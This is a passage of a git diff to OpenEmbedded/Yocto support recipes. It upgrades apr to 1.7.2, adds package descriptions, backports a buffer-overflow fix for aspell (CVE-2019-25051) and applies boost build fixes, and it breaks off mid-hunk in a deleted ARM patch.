- flags="$flags -L$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
- else
- ### this surely can't work since the library is in .libs?
- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
- # Since the user is specifying they are linking with libtool, we
- # *know* that -R will be recognized by libtool.
- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L${APR_TARGET_DIR}/$libdir -l${APR_LIBNAME}"
- else
- flags="$flags $LA_FILE"
- fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
;;
--shlib-path-var)
echo "$SHLIBPATH_VAR"
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
-From: Hongxu Jia <hongxu.jia@windriver.com>
-Date: Fri, 2 Feb 2018 15:51:42 +0800
-Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
-
-While cross compiling, the tools/gen_test_char could not
-be executed at build time, use AX_PROG_CC_FOR_BUILD to
-build native tools/gen_test_char
-
-Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
-
-Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
----
- Makefile.in | 10 +++-------
- configure.in | 3 +++
- 2 files changed, 6 insertions(+), 7 deletions(-)
-
-diff --git a/Makefile.in b/Makefile.in
-index 5fb760e..8675f90 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
-
- CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
- build/apr_rules.out tools/gen_test_char@EXEEXT@ \
-- tools/gen_test_char.o tools/gen_test_char.lo \
-+ tools/gen_test_char.o \
- include/private/apr_escape_test_char.h
- DISTCLEAN_TARGETS = config.cache config.log config.status \
- include/apr.h include/arch/unix/apr_private.h \
-@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
- etags:
- etags `find . -name '*.[ch]'`
-
--OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
--tools/gen_test_char.lo: tools/gen_test_char.c
-+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
- $(APR_MKDIR) tools
-- $(LT_COMPILE)
--
--tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
-- $(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
-+ $(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
-
- include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
- $(APR_MKDIR) include/private
-diff --git a/configure.in b/configure.in
-index 719f331..361120f 100644
---- a/configure.in
-+++ b/configure.in
-@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
- dnl preload section from invoking the macro to get compiler info.
- AC_PROG_CC
-
-+dnl Check build CC for gen_test_char compiling which is executed at build time.
-+AX_PROG_CC_FOR_BUILD
-+
- dnl AC_PROG_SED is only avaliable in recent autoconf versions.
- dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
- ifdef([AC_PROG_SED],
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
-From: Dengke Du <dengke.du@windriver.com>
-Date: Wed, 14 Dec 2016 18:13:08 +0800
-Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
- compiling
-
-In configure.in, it contains the following:
-
- APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-
-the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
-it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
-compiling enable.
-
-So it was hardcoded for cross compiling, we should detect it dynamic based on
-the sysroot's glibc. We change it to the following:
-
- AC_CHECK_SIZEOF(off_t)
-
-The same for the following hardcoded types for cross compiling:
-
- pid_t 8
- ssize_t 8
- size_t 8
- off_t 8
-
-Change the above correspondingly.
-
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
-
-Upstream-Status: Pending
-
----
- configure.in | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/configure.in b/configure.in
-index 27b8539..fb408d1 100644
---- a/configure.in
-+++ b/configure.in
-@@ -1801,7 +1801,7 @@ else
- socklen_t_value="int"
- fi
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
-+AC_CHECK_SIZEOF(pid_t)
-
- if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
- pid_t_fmt='#define APR_PID_T_FMT "hd"'
-@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
- APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
- ])
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
-+AC_CHECK_SIZEOF(ssize_t)
-
- dnl the else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_ssize_t])
-@@ -1891,7 +1891,7 @@ fi
-
- ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
-+AC_CHECK_SIZEOF(size_t)
-
- # else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_size_t])
-@@ -1909,7 +1909,7 @@ fi
-
- size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-+AC_CHECK_SIZEOF(off_t)
-
- if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
- # Enable LFS
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
+From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
From: Helmut Grohne <helmut@subdivi.de>
-Subject: check for libtoolize rather than libtool
-Last-Update: 2014-09-19
+Date: Tue, 7 Feb 2023 07:04:00 +0000
+Subject: [PATCH] check for libtoolize rather than libtool
libtool is now in package libtool-bin, but apr only needs libtoolize.
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
---- apr.orig/build/buildcheck.sh
-+++ apr/build/buildcheck.sh
-@@ -39,11 +39,11 @@ fi
+---
+ build/buildcheck.sh | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/build/buildcheck.sh b/build/buildcheck.sh
+index 44921b5..08bc8a8 100755
+--- a/build/buildcheck.sh
++++ b/build/buildcheck.sh
+@@ -39,13 +39,11 @@ fi
# ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
# output is multiline from 1.5 onwards
-# Require libtool 1.4 or newer
--libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-if test -z "$libtool"; then
+- libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-fi
-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
+# Require libtoolize 1.4 or newer
+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index 7073af8c98..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,4 +1,8 @@
SUMMARY = "Apache Portable Runtime (APR) library"
+
+DESCRIPTION = "Create and maintain software libraries that provide a predictable \
+and consistent interface to underlying platform-specific implementations."
+
HOMEPAGE = "http://apr.apache.org/"
SECTION = "libs"
DEPENDS = "util-linux"
@@ -12,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
file://run-ptest \
file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
- file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
file://0004-Fix-packet-discards-HTTP-redirect.patch \
file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
- file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
file://libtoolize_check.patch \
file://0001-Add-option-to-disable-timed-dependant-tests.patch \
+ file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
"
-SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7"
-SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
+SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
@@ -30,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
-
+# Enable largefile
+CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
+# Additional AC_TRY_RUN tests which will need to be cached for cross compile
+CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
+ ac_cv_struct_rlimit=yes \
+ ac_cv_func_sem_open=yes \
+ apr_cv_process_shared_works=yes \
+ apr_cv_mutex_robust_shared=yes \
+ "
# Also suppress trying to use sctp.
#
CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
-CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes"
+# ac_cv_sizeof_struct_iovec is deduced using runtime check which will fail during cross-compile
+CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
+
CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
+CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
+PACKAGECONFIG:append:libc-musl = " xsi-strerror"
PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
+PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
do_configure_prepend() {
# Avoid absolute paths for grep since it causes failures
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Glibc hierarchical argument parsing standalone library"
+DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index 629987810a..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,10 +1,21 @@
SUMMARY = "GNU Aspell spell-checker"
+
+DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
+It can either be used as a library or as an independent spell checker. \
+Its main feature is that it does a superior job of suggesting possible \
+replacements for a misspelled word than just about any other spell \
+checker out there for the English language."
+
SECTION = "console/utils"
+HOMEPAGE = "http://aspell.net/"
+
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
-SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz"
+SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
+ file://CVE-2019-25051.patch \
+"
SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
+From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
+From: Kevin Atkinson <kevina@gnu.org>
+Date: Sat, 21 Dec 2019 20:32:47 +0000
+Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
+ to prevent a buffer overflow
+
+Bug found using OSS-Fuze.
+
+Upstream-Status: Backport
+[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
+CVE: CVE-2019-25051
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ common/objstack.hpp | 18 ++++++++++++++----
+ 1 file changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/common/objstack.hpp b/common/objstack.hpp
+index 3997bf7..bd97ccd 100644
+--- a/common/objstack.hpp
++++ b/common/objstack.hpp
+@@ -5,6 +5,7 @@
+ #include "parm_string.hpp"
+ #include <stdlib.h>
+ #include <assert.h>
++#include <stddef.h>
+
+ namespace acommon {
+
+@@ -26,6 +27,12 @@ class ObjStack
+ byte * temp_end;
+ void setup_chunk();
+ void new_chunk();
++ bool will_overflow(size_t sz) const {
++ return offsetof(Node,data) + sz > chunk_size;
++ }
++ void check_size(size_t sz) {
++ assert(!will_overflow(sz));
++ }
+
+ ObjStack(const ObjStack &);
+ void operator=(const ObjStack &);
+@@ -56,7 +63,7 @@ class ObjStack
+ void * alloc_bottom(size_t size) {
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
++ if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
+ return tmp;
+ }
+ // This alloc_bottom will insure that the object is aligned based on the
+@@ -66,7 +73,7 @@ class ObjStack
+ align_bottom(align);
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); goto loop;}
++ if (bottom > top) {check_size(size); new_chunk(); goto loop;}
+ return tmp;
+ }
+ char * dup_bottom(ParmString str) {
+@@ -79,7 +86,7 @@ class ObjStack
+ // always be aligned as such.
+ void * alloc_top(size_t size) {
+ top -= size;
+- if (top < bottom) {new_chunk(); top -= size;}
++ if (top < bottom) {check_size(size); new_chunk(); top -= size;}
+ return top;
+ }
+ // This alloc_top will insure that the object is aligned based on
+@@ -88,7 +95,7 @@ class ObjStack
+ {loop:
+ top -= size;
+ align_top(align);
+- if (top < bottom) {new_chunk(); goto loop;}
++ if (top < bottom) {check_size(size); new_chunk(); goto loop;}
+ return top;
+ }
+ char * dup_top(ParmString str) {
+@@ -117,6 +124,7 @@ class ObjStack
+ void * alloc_temp(size_t size) {
+ temp_end = bottom + size;
+ if (temp_end > top) {
++ check_size(size);
+ new_chunk();
+ temp_end = bottom + size;
+ }
+@@ -131,6 +139,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
+@@ -150,6 +159,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
SUMMARY = "AT-SPI 2 Toolkit Bridge"
+DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index 84e05e77fc..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,5 +1,9 @@
SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
+
+DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
+
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Accessibility toolkit for GNOME"
+DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
HOMEPAGE = "https://wiki.gnome.org/Accessibility"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index 5bb50f77f7..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,5 +1,10 @@
SUMMARY = "Utilities for managing POSIX Access Control Lists"
+DESCRIPTION = "ACL allows you to provide different levels of access to files \
+and folders for different users."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
+BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
+
SECTION = "libs"
LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index f13a83a7b4..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
+++ b/meta/recipes-support/attr/attr.inc
@@ -1,4 +1,6 @@
SUMMARY = "Utilities for manipulating filesystem extended attributes"
+DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
SECTION = "libs"
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 93e7d9dc3c..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,4 +1,9 @@
SUMMARY = "Programmable Completion for Bash 4"
+DESCRIPTION = "Collection of command line command completions for the Bash shell, \
+collection of helper functions to assist in creating new completions, \
+and set of facilities for loading completions automatically on demand, as well \
+as installing them."
+
HOMEPAGE = "https://github.com/scop/bash-completion"
BUGTRACKER = "https://github.com/scop/bash-completion/issues"
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 7c4db85b32..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/intel/${BPN}"
+SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
S = "${WORKDIR}/git"
@@ -22,4 +22,4 @@ RDEPENDS_${PN} = "python3-core python3-compression python3-mmap python3-setuptoo
inherit python3native
inherit setuptools3
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
BOOST_P = "boost_${BOOST_VER}"
-SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2"
+SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
SUMMARY = "Free peer-reviewed portable C++ source libraries"
+DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries. The emphasis is on libraries which work well with the C++ \
+Standard Library. One goal is to establish 'existing practice' and \
+provide reference implementations so that the Boost libraries are suitable for eventual standardization. Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
+upcoming C++ Standard Library Technical Report."
SECTION = "libs"
DEPENDS = "bjam-native zlib bzip2"
@@ -161,7 +165,7 @@ do_configure() {
# D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
rm -f ${WORKDIR}/user-config.jam
- echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
+ echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
# If we want Python then we need to tell Boost *exactly* where to find it
if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
+From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
+From: Romain Geissler <romain.geissler@amadeus.com>
+Date: Tue, 10 Aug 2021 14:22:28 +0000
+Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
+ platforms.
+
+In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
+ from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
+ from src/GetTest.cpp:12:
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
+ 61 | if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ | ^
+
+Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index bc9b1367..c43b276d 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -58,7 +58,7 @@ namespace boost
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+ #ifdef PTHREAD_STACK_MIN
+- if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
++ if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
+ int res = pthread_attr_setstacksize(&val_, size);
diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
+From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
+From: Rob Boehne <robb@datalogics.com>
+Date: Wed, 20 Nov 2019 11:25:20 -0600
+Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
+ to fail.
+
+Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index aefbeb43..bc9b1367 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -57,7 +57,7 @@ namespace boost
+ #else
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+-#if PTHREAD_STACK_MIN > 0
++#ifdef PTHREAD_STACK_MIN
+ if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
diff --git a/meta/recipes-support/boost/boost/arm-intrinsics.patch b/meta/recipes-support/boost/boost/arm-intrinsics.patch
deleted file mode 100644
index fe85c69a82..0000000000
--- a/meta/recipes-support/boost/boost/arm-intrinsics.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-Upstream-Status: Backport
-
-8/17/2010 - rebased to 1.44 by Qing He <qing.he@intel.com>
-
-diff --git a/boost/smart_ptr/detail/atomic_count_sync.hpp b/boost/smart_ptr/detail/atomic_count_sync.hpp
-index b6359b5..78b1cc2 100644
---- a/boost/smart_ptr/detail/atomic_count_sync.hpp
-+++ b/boost/smart_ptr/detail/atomic_count_sync.hpp
-@@ -33,17 +33,46 @@ public:
-
- long operator++()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
-+ "add %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+#else
- return __sync_add_and_fetch( &value_, 1 );
-+#endif
- }
-
- long operator--()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
